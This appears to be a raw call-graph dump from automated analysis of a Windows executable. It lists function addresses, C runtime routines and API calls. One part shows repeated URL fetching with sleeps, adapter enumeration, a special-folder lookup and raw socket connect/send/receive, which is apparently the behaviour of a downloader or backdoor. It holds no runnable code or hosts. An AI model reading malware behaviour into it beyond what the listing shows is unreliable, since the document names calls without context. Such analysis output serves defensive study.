19005 16b3cf7 19002->19005 19003 16b3bb6 19003->19037 19045 16b5d94 19003->19045 19007 16b91cb __CRT_INIT@12 TlsGetValue 19004->19007 19005->19037 19176 16b5c24 19005->19176 19148 16b8333 RtlDecodePointer 19006->19148 19012 16b3ca4 19007->19012 19015 16b8a6d __calloc_crt 59 API calls 19012->19015 19012->19037 19014 16b3bc6 __RTC_Initialize 19021 16b3bd6 GetCommandLineA 19014->19021 19014->19037 19017 16b3cb5 19015->19017 19016 16b3c66 __CRT_INIT@12 19172 16b3c7f 19016->19172 19022 16b91ea __CRT_INIT@12 TlsSetValue 19017->19022 19017->19037 19018 16bb57f __ioterm 60 API calls 19020 16b3c61 19018->19020 19023 16b5e0a __mtterm 62 API calls 19020->19023 19066 16bb97d GetEnvironmentStringsW 19021->19066 19025 16b3ccd 19022->19025 19023->19016 19027 16b3ceb 19025->19027 19028 16b3cd3 19025->19028 19031 16b2f74 _free 59 API calls 19027->19031 19030 16b5ce1 __initptd 59 API calls 19028->19030 19033 16b3cdb GetCurrentThreadId 19030->19033 19031->19037 19032 16b3bf0 19034 16b3bf4 19032->19034 19098 16bb5d1 19032->19098 19033->19037 19131 16b5e0a 19034->19131 19037->18989 19039 16b3c14 19039->19037 19140 16bb57f 19039->19140 19044->19003 19184 16b8503 RtlEncodePointer 19045->19184 19047 16b5d99 19189 16b8a1f 19047->19189 19050 16b5da2 19052 16b5e0a __mtterm 62 API calls 19050->19052 19053 16b5da7 19052->19053 19053->19014 19055 16b5dbf 19056 16b8a6d __calloc_crt 59 API calls 19055->19056 19057 16b5dcc 19056->19057 19058 16b5e01 19057->19058 19059 16b91ea __CRT_INIT@12 TlsSetValue 19057->19059 19060 16b5e0a __mtterm 62 API calls 19058->19060 19061 16b5de0 19059->19061 19062 16b5e06 19060->19062 19061->19058 19063 16b5de6 19061->19063 19062->19014 19064 16b5ce1 __initptd 59 API calls 19063->19064 19065 16b5dee GetCurrentThreadId 19064->19065 19065->19014 19067 16bb990 WideCharToMultiByte 19066->19067 19068 16b3be6 19066->19068 19070 16bb9fa FreeEnvironmentStringsW 19067->19070 19071 16bb9c3 19067->19071 19079 16bb2cb 19068->19079 19070->19068 19072 16b8ab5 __malloc_crt 59 API calls 19071->19072 19073 16bb9c9 19072->19073 19073->19070 19074 16bb9d0 WideCharToMultiByte 19073->19074 19075 16bb9ef FreeEnvironmentStringsW 19074->19075 19076 16bb9e6 19074->19076 19075->19068 19077 16b2f74 _free 59 API calls 19076->19077 19078 16bb9ec 19077->19078 19078->19075 19080 16bb2d7 ___lock_fhandle 19079->19080 19081 16b88ee __lock 59 API calls 19080->19081 19082 16bb2de 19081->19082 19083 16b8a6d __calloc_crt 59 API calls 19082->19083 19085 16bb2ef 19083->19085 19084 16bb35a GetStartupInfoW 19093 16bb49e 19084->19093 19094 16bb36f 19084->19094 19085->19084 19086 16bb2fa ___lock_fhandle @_EH4_CallFilterFunc@8 19085->19086 19086->19032 19087 16bb566 19197 16bb576 19087->19197 19089 16b8a6d __calloc_crt 59 API calls 19089->19094 19090 16bb4eb GetStdHandle 19090->19093 19091 16bb3bd 19091->19093 19095 16bb3f1 GetFileType 19091->19095 19096 16b920c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19091->19096 19092 16bb4fe GetFileType 19092->19093 19093->19087 19093->19090 19093->19092 19097 16b920c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19093->19097 19094->19089 19094->19091 19094->19093 19095->19091 19096->19091 19097->19093 19099 16bb5df 19098->19099 19100 16bb5e4 GetModuleFileNameA 19098->19100 19207 16b528a 19099->19207 19102 16bb611 19100->19102 19201 16bb684 19102->19201 19104 16b3c00 19104->19039 19109 16bb800 19104->19109 19106 16b8ab5 __malloc_crt 59 API calls 19107 16bb64a 19106->19107 19107->19104 19108 16bb684 _parse_cmdline 59 API calls 19107->19108 19108->19104 19110 16bb809 19109->19110 19112 16bb80e _strlen 19109->19112 19111 16b528a ___initmbctable 71 API calls 19110->19111 19111->19112 19113 16b8a6d __calloc_crt 59 API calls 19112->19113 19116 16b3c09 19112->19116 19121 16bb844 _strlen 19113->19121 19116->19039 19125 16b846b 19116->19125 19121->19116 19132 16b5e14 19131->19132 19134 16b5e1a 19131->19134 19383 16b91ac 19132->19383 19135 16b8938 RtlDeleteCriticalSection 19134->19135 19136 16b8954 19134->19136 19137 16b2f74 _free 59 API calls 19135->19137 19138 16b8960 RtlDeleteCriticalSection 19136->19138 19139 16b8973 19136->19139 19137->19134 19138->19136 19139->19037 19144 16bb586 19140->19144 19141 16bb5ce 19141->19034 19142 16b2f74 _free 59 API calls 19142->19144 19143 16bb59f RtlDeleteCriticalSection 19143->19144 19144->19141 19144->19142 19144->19143 19146 16b85a5 _doexit 59 API calls 19145->19146 19147 16b8467 19146->19147 19147->19006 19149 16b834d 19148->19149 19150 16b835f 19148->19150 19149->19150 19153 16b2f74 _free 59 API calls 19149->19153 19151 16b2f74 _free 59 API calls 19150->19151 19152 16b836c 19151->19152 19154 16b8390 19152->19154 19156 16b2f74 _free 59 API calls 19152->19156 19153->19149 19155 16b2f74 _free 59 API calls 19154->19155 19157 16b839c 19155->19157 19156->19152 19158 16b2f74 _free 59 API calls 19157->19158 19159 16b83ad 19158->19159 19160 16b2f74 _free 59 API calls 19159->19160 19161 16b83b8 19160->19161 19162 16b83dd RtlEncodePointer 19161->19162 19164 16b2f74 _free 59 API calls 19161->19164 19163 16b83f2 19162->19163 19168 16b83f8 19162->19168 19165 16b2f74 _free 59 API calls 19163->19165 19167 16b83dc 19164->19167 19165->19168 19166 16b840e 19170 16b3c55 19166->19170 19171 16b2f74 _free 59 API calls 19166->19171 19167->19162 19168->19166 19169 16b2f74 _free 59 API calls 19168->19169 19169->19166 19170->19016 19170->19018 19171->19170 19173 16b3c91 19172->19173 19174 16b3c83 19172->19174 19173->19037 19174->19173 19175 16b5e0a __mtterm 62 API calls 19174->19175 19175->19173 19177 16b5c31 19176->19177 19183 16b5c57 19176->19183 19178 16b5c3f 19177->19178 19179 16b91cb __CRT_INIT@12 TlsGetValue 19177->19179 19180 16b91ea __CRT_INIT@12 TlsSetValue 19178->19180 19179->19178 19181 16b5c4f 19180->19181 19386 16b5aef 19181->19386 19183->19037 19185 16b8514 __init_pointers __initp_misc_winsig 19184->19185 19196 16b3a07 RtlEncodePointer 19185->19196 19187 16b852c __init_pointers 19188 16b927a 34 API calls 19187->19188 19188->19047 19190 16b8a2b 19189->19190 19191 16b920c ___lock_fhandle InitializeCriticalSectionAndSpinCount 19190->19191 19192 16b5d9e 19190->19192 19191->19190 19192->19050 19193 16b918e 19192->19193 19194 16b91a5 TlsAlloc 19193->19194 19195 16b5db4 19193->19195 19195->19050 19195->19055 19196->19187 19200 16b8a58 RtlLeaveCriticalSection 19197->19200 19199 16bb57d 19199->19086 19200->19199 19203 16bb6a6 19201->19203 19206 16bb70a 19203->19206 19211 16c15d6 19203->19211 19204 16bb627 19204->19104 19204->19106 19205 16c15d6 _parse_cmdline 59 API calls 19205->19206 19206->19204 19206->19205 19208 16b5293 19207->19208 19209 16b529a 19207->19209 19267 16b55e7 19208->19267 19209->19100 19214 16c157c 19211->19214 19217 16b227b 19214->19217 19218 16b228c 19217->19218 19224 16b22d9 19217->19224 19225 16b5c5a 19218->19225 19224->19203 19226 16b5c72 __getptd_noexit 59 API calls 19225->19226 19227 16b5c60 19226->19227 19268 16b55f3 ___lock_fhandle 19267->19268 19269 16b5c5a __setmbcp 59 API calls 19268->19269 19270 16b55fb 19269->19270 19271 16b5541 __setmbcp 59 API calls 19270->19271 19272 16b5605 19271->19272 19292 16b52e2 19272->19292 19293 16b227b _LocaleUpdate::_LocaleUpdate 59 API calls 19292->19293 19384 16b91bf 19383->19384 19385 16b91c3 TlsFree 19383->19385 19384->19134 19385->19134 19387 16b5afb ___lock_fhandle 19386->19387 19388 16b5b14 19387->19388 19389 16b2f74 _free 59 API calls 19387->19389 19391 16b5c03 ___lock_fhandle 19387->19391 19390 16b5b23 19388->19390 19392 16b2f74 _free 59 API calls 19388->19392 19389->19388 19393 16b5b32 19390->19393 19394 16b2f74 _free 59 API calls 19390->19394 19391->19183 19392->19390 19395 16b5b41 19393->19395 19397 16b2f74 _free 59 API calls 19393->19397 19394->19393 19396 16b5b50 19395->19396 19398 16b2f74 _free 59 API calls 19395->19398 19399 16b5b5f 19396->19399 19400 16b2f74 _free 59 API calls 19396->19400 19397->19395 19398->19396 19401 16b5b6e 19399->19401 19402 16b2f74 _free 59 API calls 19399->19402 19400->19399 19403 16b5b80 19401->19403 19405 16b2f74 _free 59 API calls 19401->19405 19402->19401 19404 16b88ee __lock 59 API calls 19403->19404 19408 16b5b88 19404->19408 19405->19403 19406 16b5bab 19418 16b5c0f 19406->19418 19408->19406 19410 16b2f74 _free 59 API calls 19408->19410 19410->19406 19411 16b88ee __lock 59 API calls 19415 16b5bbf ___removelocaleref 19411->19415 19414 16b2f74 _free 59 API calls 19414->19391 19417 16b5bf0 19415->19417 19421 16b4fc5 19415->19421 19451 16b5c1b 19417->19451 19454 16b8a58 RtlLeaveCriticalSection 19418->19454 19420 16b5bb8 19420->19411 19422 16b503e 19421->19422 19428 16b4fda 19421->19428 19423 16b2f74 _free 59 API calls 19422->19423 19450 16b508b 19422->19450 19424 16b505f 19423->19424 19429 16b2f74 _free 59 API calls 19424->19429 19426 16b500b 19430 16b5029 19426->19430 19440 16b2f74 _free 59 API calls 19426->19440 19428->19422 19428->19426 19432 16b2f74 _free 59 API calls 19428->19432 19434 16b5072 19429->19434 19435 16b2f74 _free 59 API calls 19430->19435 19431 16b2f74 _free 59 API calls 19436 16b50b4 19431->19436 19437 16b5000 19432->19437 19433 16b5113 19438 16b2f74 _free 59 API calls 19433->19438 19439 16b2f74 _free 59 API calls 19434->19439 19441 16b5033 19435->19441 19436->19433 19448 16b2f74 59 API calls _free 19436->19448 19455 16bd3da 19437->19455 19443 16b5119 19438->19443 19444 16b5080 19439->19444 19445 16b501e 19440->19445 19446 16b2f74 _free 59 API calls 19441->19446 19443->19417 19447 16b2f74 _free 59 API calls 19444->19447 19483 16bd4d6 19445->19483 19446->19422 19447->19450 19448->19436 19450->19436 19495 16bd53d 19450->19495 19671 16b8a58 RtlLeaveCriticalSection 19451->19671 19453 16b5bfd 19453->19414 19454->19420 19456 16bd3e9 19455->19456 19482 16bd4d2 19455->19482 19457 16bd3fa 19456->19457 19458 16b2f74 _free 59 API calls 19456->19458 19459 16bd40c 19457->19459 19461 16b2f74 _free 59 API calls 19457->19461 19458->19457 19460 16bd41e 19459->19460 19462 16b2f74 _free 59 API calls 19459->19462 19463 16b2f74 _free 59 API calls 19460->19463 19464 16bd430 19460->19464 19461->19459 19462->19460 19463->19464 19465 16b2f74 _free 59 API calls 19464->19465 19466 16bd442 19464->19466 19465->19466 19467 16bd454 19466->19467 19469 16b2f74 _free 59 API calls 19466->19469 19468 16bd466 19467->19468 19470 16b2f74 _free 59 API calls 19467->19470 19471 16bd478 19468->19471 19472 16b2f74 _free 59 API calls 19468->19472 19469->19467 19470->19468 19472->19471 19482->19426 19484 16bd539 19483->19484 19485 16bd4e1 19483->19485 19484->19430 19486 16bd4f1 19485->19486 19487 16b2f74 _free 59 API calls 19485->19487 19488 16bd503 19486->19488 19489 16b2f74 _free 59 API calls 19486->19489 19487->19486 19490 16bd515 19488->19490 19491 16b2f74 _free 59 API calls 19488->19491 19489->19488 19492 16bd527 19490->19492 19493 16b2f74 _free 59 API calls 19490->19493 19491->19490 19492->19484 19494 16b2f74 _free 59 API calls 19492->19494 19493->19492 19494->19484 19496 16bd54c 19495->19496 19670 16b50a9 19495->19670 19497 16b2f74 _free 59 API calls 19496->19497 19498 16bd554 19497->19498 19499 16b2f74 _free 59 API calls 19498->19499 19500 16bd55c 19499->19500 19501 16b2f74 _free 59 API calls 19500->19501 19502 16bd564 19501->19502 19503 16b2f74 _free 59 API calls 19502->19503 19504 16bd56c 19503->19504 19505 16b2f74 _free 59 API calls 19504->19505 19670->19431 19671->19453 19672 4027ac 19673 40d0cc 19672->19673 19674 40d0d1 ExitProcess 19673->19674 19675 16af9a7 LoadLibraryA 19676 16afa8a 19675->19676 19677 16af9d0 GetProcAddress 19675->19677 19678 16afa83 FreeLibrary 19677->19678 19681 16af9e4 19677->19681 19678->19676 19679 16af9f6 GetAdaptersInfo 19679->19681 19680 16afa7e 19680->19678 19681->19679 19681->19680 19682 16b3b4c _Allocate 60 API calls 19681->19682 19682->19681 19683 16a72a7 InternetOpenA 19684 16a72c5 InternetSetOptionA InternetSetOptionA InternetSetOptionA 19683->19684 19721 16a66f0 _memset shared_ptr 19683->19721 19690 16a733e _memset 19684->19690 19685 16a731e InternetOpenUrlA 19686 16a737e InternetCloseHandle 19685->19686 19685->19690 19686->19721 19687 16a670a RtlEnterCriticalSection RtlLeaveCriticalSection 19687->19721 19688 16a6704 Sleep 19688->19687 19689 16a7342 InternetReadFile 19689->19690 19691 16a7373 InternetCloseHandle 19689->19691 19690->19685 19690->19689 19691->19686 19692 16a73e5 RtlEnterCriticalSection RtlLeaveCriticalSection 19794 16b233c 19692->19794 19694 16b2fac _malloc 59 API calls 19695 16a7499 RtlEnterCriticalSection RtlLeaveCriticalSection 19694->19695 19695->19721 19696 16b233c 66 API calls 19696->19721 19697 16a7766 RtlEnterCriticalSection RtlLeaveCriticalSection 19697->19721 19701 16a78de RtlEnterCriticalSection 19702 16a790b RtlLeaveCriticalSection 19701->19702 19701->19721 19846 16a3c67 19702->19846 19704 16b2fac 59 API calls _malloc 19704->19721 19705 16b2f74 59 API calls _free 19705->19721 19711 16b3b4c _Allocate 60 API calls 19711->19721 19716 16b35e6 60 API calls _strtok 19716->19721 19717 16aa725 73 API calls 19717->19721 19721->19683 19721->19687 19721->19688 19721->19692 19721->19694 19721->19696 19721->19697 19721->19701 19721->19702 19721->19704 19721->19705 19721->19711 19721->19716 19721->19717 19722 16a76e8 Sleep 19721->19722 19723 16a76e3 shared_ptr 19721->19723 19726 16a5119 19721->19726 19755 16aac0f 19721->19755 19765 16a61f1 19721->19765 19768 16a833b 19721->19768 19774 16ad117 19721->19774 19779 16a83ea 19721->19779 19787 16a33b2 19721->19787 19804 16b2850 19721->19804 19807 16a9737 19721->19807 19814 16aa84f 19721->19814 19822 16a4100 19721->19822 19826 16b2418 19721->19826 19837 16a1ba7 19721->19837 19853 16a3d7e 19721->19853 19860 16a9003 19721->19860 19867 16a534d 19721->19867 19818 16b18f0 19722->19818 19723->19722 19727 16a5123 __EH_prolog 19726->19727 19877 16b0b10 19727->19877 19730 16a3c67 72 API calls 19731 16a514a 19730->19731 19732 16a3d7e 64 API calls 19731->19732 19733 16a5158 19732->19733 19734 16a833b 89 API calls 19733->19734 19735 16a516c 19734->19735 19736 16a5322 shared_ptr 19735->19736 19881 16aa725 19735->19881 19736->19721 19739 16a51f6 19742 16aa725 73 API calls 19739->19742 19740 16a51c4 19741 16aa725 73 API calls 19740->19741 19743 16a51d4 19741->19743 19744 16a5207 19742->19744 19743->19736 19746 16aa725 73 API calls 19743->19746 19744->19736 19745 16aa725 73 API calls 19744->19745 19747 16a524a 19745->19747 19748 16a52b4 19746->19748 19747->19736 19749 16aa725 73 API calls 19747->19749 19748->19736 19750 16aa725 73 API calls 19748->19750 19749->19743 19751 16a52da 19750->19751 19751->19736 19752 16aa725 73 API calls 19751->19752 19753 16a5304 19752->19753 19886 16aced9 19753->19886 19756 16aac19 __EH_prolog 19755->19756 19937 16ad0ee 19756->19937 19758 16aac3a shared_ptr 19940 16b20f0 19758->19940 19760 16aac51 19761 16aac67 19760->19761 19946 16a3fb0 19760->19946 19761->19721 19766 16b2fac _malloc 59 API calls 19765->19766 19767 16a6204 19766->19767 19769 16a8374 19768->19769 19770 16a8353 19768->19770 19773 16a8399 19769->19773 20572 16a2ac7 19769->20572 20569 16a95fd 19770->20569 19773->19721 19775 16b0b10 Mailbox 68 API calls 19774->19775 19778 16ad12d 19775->19778 19776 16ad21b 19776->19721 19777 16a2db5 73 API calls 19777->19778 19778->19776 19778->19777 19780 16a8405 WSASetLastError shutdown 19779->19780 19781 16a83f5 19779->19781 19782 16aa509 69 API calls 19780->19782 19783 16b0b10 Mailbox 68 API calls 19781->19783 19784 16a8422 19782->19784 19785 16a83fa 19783->19785 19784->19785 19786 16b0b10 Mailbox 68 API calls 19784->19786 19785->19721 19786->19785 19788 16a33e1 19787->19788 19789 16a33c4 InterlockedCompareExchange 19787->19789 19790 16a29ee 76 API calls 19788->19790 19789->19788 19791 16a33d6 19789->19791 19792 16a33f1 19790->19792 20662 16a32ab 19791->20662 19792->19721 19795 16b2348 19794->19795 19796 16b236b 19794->19796 19795->19796 19798 16b234e 19795->19798 20715 16b2383 19796->20715 19800 16b5e5b __setmbcp 59 API calls 19798->19800 19799 16b237e 19799->19721 19801 16b2353 19800->19801 19802 16b4ef5 __gmtime64_s 9 API calls 19801->19802 19803 16b235e 19802->19803 19803->19721 20725 16b286e 19804->20725 19806 16b2869 19806->19721 19808 16a9741 __EH_prolog 19807->19808 19809 16a1ba7 282 API calls 19808->19809 19810 16a9796 19809->19810 19811 16a97b3 RtlEnterCriticalSection 19810->19811 19812 16a97ce 19811->19812 19813 16a97d1 RtlLeaveCriticalSection 19811->19813 19812->19813 19813->19721 19815 16aa859 __EH_prolog 19814->19815 20731 16ae000 19815->20731 19817 16aa877 shared_ptr 19817->19721 19819 16b18fd 19818->19819 19820 16b1921 19818->19820 19819->19820 19821 16b1911 GetProcessHeap HeapFree 19819->19821 19820->19721 19821->19820 19823 16a4118 19822->19823 19824 16a4112 19822->19824 19823->19721 20735 16aa703 19824->20735 19827 16b2449 19826->19827 19828 16b2434 19826->19828 19827->19828 19830 16b2450 19827->19830 19829 16b5e5b __setmbcp 59 API calls 19828->19829 19831 16b2439 19829->19831 20737 16b6050 19830->20737 19833 16b4ef5 __gmtime64_s 9 API calls 19831->19833 19835 16b2444 19833->19835 19835->19721 20962 16c53f0 19837->20962 19839 16a1bb1 RtlEnterCriticalSection 19840 16a1be9 RtlLeaveCriticalSection 19839->19840 19842 16a1bd1 19839->19842 20963 16ae330 19840->20963 19842->19840 19843 16a1c55 RtlLeaveCriticalSection 19842->19843 19843->19721 19844 16a1c22 19844->19843 19847 16b0b10 Mailbox 68 API calls 19846->19847 19848 16a3c7e 19847->19848 21020 16a3ca2 19848->21020 19854 16a3dcb htons 19853->19854 19855 16a3d99 htons 19853->19855 21066 16a3c16 19854->21066 19856 16a3bd3 60 API calls 19855->19856 19858 16a3db7 htonl htonl 19856->19858 19859 16a3ded 19858->19859 19859->19721 19861 16a900d __EH_prolog 19860->19861 21072 16a373f 19861->21072 19863 16a9027 RtlEnterCriticalSection 19864 16a9036 RtlLeaveCriticalSection 19863->19864 19866 16a9070 19864->19866 19866->19721 19868 16b2fac _malloc 59 API calls 19867->19868 19869 16a5362 SHGetSpecialFolderPathA 19868->19869 19870 16a5378 19869->19870 19870->19870 21081 16b3771 19870->21081 19873 16a53e2 19873->19721 19875 16a53dc 21097 16b3a84 19875->21097 19878 16b0b39 19877->19878 19879 16a513d 19877->19879 19880 16b33a4 __cinit 68 API calls 19878->19880 19879->19730 19880->19879 19882 16b0b10 Mailbox 68 API calls 19881->19882 19883 16aa73f 19882->19883 19884 16a519d 19883->19884 19891 16a2db5 19883->19891 19884->19736 19884->19739 19884->19740 19887 16b0b10 Mailbox 68 API calls 19886->19887 19888 16acef3 19887->19888 19889 16ad002 19888->19889 19918 16a2b95 19888->19918 19889->19736 19892 16a2dca 19891->19892 19893 16a2de4 19891->19893 19894 16b0b10 Mailbox 68 API calls 19892->19894 19895 16a2dfc 19893->19895 19898 16a2def 19893->19898 19897 16a2dcf 19894->19897 19905 16a2d39 WSASetLastError WSASend 19895->19905 19897->19883 19900 16b0b10 Mailbox 68 API calls 19898->19900 19899 16a2e0c 19899->19897 19901 16b0b10 68 API calls Mailbox 19899->19901 19902 16a2e54 WSASetLastError select 19899->19902 19904 16a2d39 71 API calls 19899->19904 19900->19897 19901->19899 19915 16aa509 19902->19915 19904->19899 19906 16aa509 69 API calls 19905->19906 19907 16a2d6e 19906->19907 19908 16a2d82 19907->19908 19909 16a2d75 19907->19909 19911 16b0b10 Mailbox 68 API calls 19908->19911 19913 16a2d7a 19908->19913 19910 16b0b10 Mailbox 68 API calls 19909->19910 19910->19913 19911->19913 19912 16a2d9c 19912->19899 19913->19912 19914 16b0b10 Mailbox 68 API calls 19913->19914 19914->19912 19916 16b0b10 Mailbox 68 API calls 19915->19916 19917 16aa515 WSAGetLastError 19916->19917 19917->19899 19919 16a2bb1 19918->19919 19920 16a2bc7 19918->19920 19921 16b0b10 Mailbox 68 API calls 19919->19921 19922 16a2bdf 19920->19922 19924 16a2bd2 19920->19924 19923 16a2bb6 19921->19923 19922->19923 19925 16a2be2 WSASetLastError WSARecv 19922->19925 19928 16a2d22 19922->19928 19930 16a2cbc WSASetLastError select 19922->19930 19932 16b0b10 68 API calls Mailbox 19922->19932 19923->19888 19927 16b0b10 Mailbox 68 API calls 19924->19927 19926 16aa509 69 API calls 19925->19926 19926->19922 19927->19923 19933 16a1996 19928->19933 19931 16aa509 69 API calls 19930->19931 19931->19922 19932->19922 19934 16a199f 19933->19934 19935 16a19bb 19933->19935 19936 16b33a4 __cinit 68 API calls 19934->19936 19935->19923 19936->19935 19959 16ae280 19937->19959 19939 16ad100 19939->19758 20041 16b33b9 19940->20041 19943 16b2114 19943->19760 19944 16b213d ResumeThread 19944->19760 19945 16b2136 CloseHandle 19945->19944 19947 16b0b10 Mailbox 68 API calls 19946->19947 19948 16a3fb8 19947->19948 20540 16a1815 19948->20540 19951 16aa68b 19952 16aa695 __EH_prolog 19951->19952 20546 16acc43 19952->20546 19960 16ae28a __EH_prolog 19959->19960 19965 16a4030 19960->19965 19964 16ae2b8 19964->19939 19977 16c53f0 19965->19977 19967 16a403a GetProcessHeap RtlAllocateHeap 19968 16a407c 19967->19968 19969 16a4053 std::exception::exception 19967->19969 19968->19964 19971 16a408a 19968->19971 19978 16aa6ca 19969->19978 19972 16a4094 __EH_prolog 19971->19972 20022 16aa2e9 19972->20022 19977->19967 19979 16aa6d4 __EH_prolog 19978->19979 19986 16acc79 19979->19986 19984 16b455a __CxxThrowException@8 RaiseException 19985 16aa702 19984->19985 19992 16ad7d9 19986->19992 19989 16acc93 20014 16ad811 19989->20014 19991 16aa6f1 19991->19984 19995 16b2513 19992->19995 19998 16b2541 19995->19998 19999 16b254f 19998->19999 20002 16aa6e3 19998->20002 20004 16b25d7 19999->20004 20002->19989 20005 16b25e0 20004->20005 20007 16b2554 20004->20007 20006 16b2f74 _free 59 API calls 20005->20006 20006->20007 20007->20002 20008 16b2599 20007->20008 20009 16b25ca 20008->20009 20010 16b25a5 _strlen 20008->20010 20009->20002 20011 16b2fac _malloc 59 API calls 20010->20011 20012 16b25b7 20011->20012 20012->20009 20013 16b6cbc __setenvp 59 API calls 20012->20013 20013->20009 20015 16ad81b __EH_prolog 20014->20015 20018 16ab73c 20015->20018 20017 16ad852 Mailbox 20017->19991 20019 16ab746 __EH_prolog 20018->20019 20020 16b2513 std::exception::exception 59 API calls 20019->20020 20021 16ab757 Mailbox 20020->20021 20021->20017 20033 16ab100 20022->20033 20025 16a3fdc 20040 16c53f0 20025->20040 20027 16a3fe6 CreateEventA 20028 16a400f 20027->20028 20029 16a3ffd 20027->20029 20028->19964 20030 16a3fb0 Mailbox 68 API calls 20029->20030 20031 16a4005 20030->20031 20032 16aa68b Mailbox 60 API calls 20031->20032 20032->20028 20034 16a40c1 20033->20034 20035 16ab10c 20033->20035 20034->20025 20036 16b3b4c _Allocate 60 API calls 20035->20036 20037 16ab11c std::exception::exception 20035->20037 20036->20037 20037->20034 20038 16b455a __CxxThrowException@8 RaiseException 20037->20038 20039 16afb31 20038->20039 20040->20027 20042 16b33db 20041->20042 20043 16b33c7 20041->20043 20045 16b8a6d __calloc_crt 59 API calls 20042->20045 20044 16b5e5b __setmbcp 59 API calls 20043->20044 20046 16b33cc 20044->20046 20047 16b33e8 20045->20047 20049 16b4ef5 __gmtime64_s 9 API calls 20046->20049 20048 16b3439 20047->20048 20050 16b5c5a __setmbcp 59 API calls 20047->20050 20051 16b2f74 _free 59 API calls 20048->20051 20055 16b210b 20049->20055 20052 16b33f5 20050->20052 20053 16b343f 20051->20053 20054 16b5ce1 __initptd 59 API calls 20052->20054 20053->20055 20060 16b5e3a 20053->20060 20056 16b33fe CreateThread 20054->20056 20055->19943 20055->19944 20055->19945 20056->20055 20059 16b3431 GetLastError 20056->20059 20068 16b3519 20056->20068 20059->20048 20065 16b5e27 20060->20065 20062 16b5e43 _free 20063 16b5e5b __setmbcp 59 API calls 20062->20063 20064 16b5e56 20063->20064 20064->20055 20066 16b5c72 __getptd_noexit 59 API calls 20065->20066 20067 16b5e2c 20066->20067 20067->20062 20069 16b3522 __threadstartex@4 20068->20069 20070 16b91cb __CRT_INIT@12 TlsGetValue 20069->20070 20071 16b3528 20070->20071 20072 16b355b 20071->20072 20073 16b352f __threadstartex@4 20071->20073 20074 16b5aef __freefls@4 59 API calls 20072->20074 20075 16b91ea __CRT_INIT@12 TlsSetValue 20073->20075 20080 16b3576 ___crtIsPackagedApp 20074->20080 20076 16b353e 20075->20076 20077 16b3551 GetCurrentThreadId 20076->20077 20078 16b3544 GetLastError RtlExitUserThread 20076->20078 20077->20080 20078->20077 20079 16b358a 20090 16b3452 20079->20090 20080->20079 20084 16b34c1 20080->20084 20085 16b34ca LoadLibraryExW GetProcAddress 20084->20085 20086 16b3503 RtlDecodePointer 20084->20086 20087 16b34ed RtlEncodePointer 20085->20087 20088 16b34ec 20085->20088 20089 16b3513 20086->20089 20087->20086 20088->20079 20089->20079 20091 16b345e ___lock_fhandle 20090->20091 20092 16b5c5a __setmbcp 59 API calls 20091->20092 20093 16b3463 20092->20093 20100 16b2160 20093->20100 20120 16b1610 20100->20120 20103 16b21a8 TlsSetValue 20104 16b21b0 20103->20104 20142 16addb4 20104->20142 20146 16add81 20104->20146 20151 16adc91 20104->20151 20131 16b1674 20120->20131 20121 16b16f0 20122 16b1706 20121->20122 20124 16b1703 CloseHandle 20121->20124 20125 16b454b __output_l 6 API calls 20122->20125 20123 16b16ce ResetEvent 20130 16b16d5 20123->20130 20124->20122 20129 16b171e 20125->20129 20126 16b179c WaitForSingleObject 20126->20131 20127 16b168c 20127->20123 20128 16b16a5 OpenEventA 20127->20128 20170 16b1c10 20127->20170 20133 16b16bf 20128->20133 20134 16b16c7 20128->20134 20129->20103 20129->20104 20174 16b1850 20130->20174 20131->20121 20131->20126 20131->20127 20135 16b1770 CreateEventA 20131->20135 20139 16b1c10 GetCurrentProcessId 20131->20139 20141 16b178e CloseHandle 20131->20141 20133->20134 20137 16b16c4 CloseHandle 20133->20137 20134->20123 20134->20130 20135->20131 20136 16b16a2 20136->20128 20137->20134 20139->20131 20141->20131 20143 16addd6 20142->20143 20185 16a4d86 20143->20185 20147 16a7cfe std::bad_exception::bad_exception 60 API calls 20146->20147 20148 16add9b 20147->20148 20369 16a4603 20148->20369 20527 16ad3c4 20151->20527 20184 16b0c70 20170->20184 20172 16b1c62 GetCurrentProcessId 20173 16b1c75 20172->20173 20173->20136 20175 16b185f 20174->20175 20178 16b1895 CreateEventA 20175->20178 20180 16b18b7 20175->20180 20181 16b1c10 GetCurrentProcessId 20175->20181 20176 16b16ed 20176->20121 20177 16b18c3 SetEvent 20177->20176 20179 16b18ab 20178->20179 20178->20180 20179->20180 20182 16b18b0 CloseHandle 20179->20182 20180->20176 20180->20177 20183 16b1892 20181->20183 20182->20180 20183->20178 20184->20172 20528 16ad3ce __EH_prolog 20527->20528 20531 16ad514 20528->20531 20543 16b24d3 20540->20543 20544 16b2599 std::exception::_Copy_str 59 API calls 20543->20544 20545 16a182a 20544->20545 20545->19951 20552 16ad70a 20546->20552 20549 16acc5d 20561 16ad742 20549->20561 20555 16ab22e 20552->20555 20556 16ab238 __EH_prolog 20555->20556 20557 16b2513 std::exception::exception 59 API calls 20556->20557 20558 16ab249 20557->20558 20559 16a7cfe std::bad_exception::bad_exception 60 API calls 20558->20559 20560 16aa6aa 20559->20560 20560->20549 20562 16ad74c __EH_prolog 20561->20562 20565 16ab626 20562->20565 20566 16ab630 __EH_prolog 20565->20566 20567 16ab22e std::bad_exception::bad_exception 60 API calls 20566->20567 20590 16a353e 20569->20590 20573 16a2ae8 WSASetLastError connect 20572->20573 20574 16a2ad8 20572->20574 20576 16aa509 69 API calls 20573->20576 20575 16b0b10 Mailbox 68 API calls 20574->20575 20577 16a2add 20575->20577 20578 16a2b07 20576->20578 20580 16b0b10 Mailbox 68 API calls 20577->20580 20578->20577 20579 16b0b10 Mailbox 68 API calls 20578->20579 20579->20577 20581 16a2b1b 20580->20581 20582 16b0b10 Mailbox 68 API calls 20581->20582 20586 16a2b38 20581->20586 20582->20586 20589 16a2b87 20586->20589 20646 16a3027 20586->20646 20588 16b0b10 Mailbox 68 API calls 20588->20589 20589->19773 20591 16a3548 __EH_prolog 20590->20591 20592 16a3576 20591->20592 20593 16a3557 20591->20593 20612 16a2edd WSASetLastError WSASocketA 20592->20612 20594 16a1996 68 API calls 20593->20594 20610 16a355f 20594->20610 20597 16a35ad CreateIoCompletionPort 20598 16a35db 20597->20598 20599 16a35c5 GetLastError 20597->20599 20601 16b0b10 Mailbox 68 API calls 20598->20601 20600 16b0b10 Mailbox 68 API calls 20599->20600 20602 16a35d2 20600->20602 20601->20602 20603 16a35ef 20602->20603 20604 16a3626 20602->20604 20605 16b0b10 Mailbox 68 API calls 20603->20605 20607 16adef3 60 API calls 20604->20607 20606 16a3608 20605->20606 20620 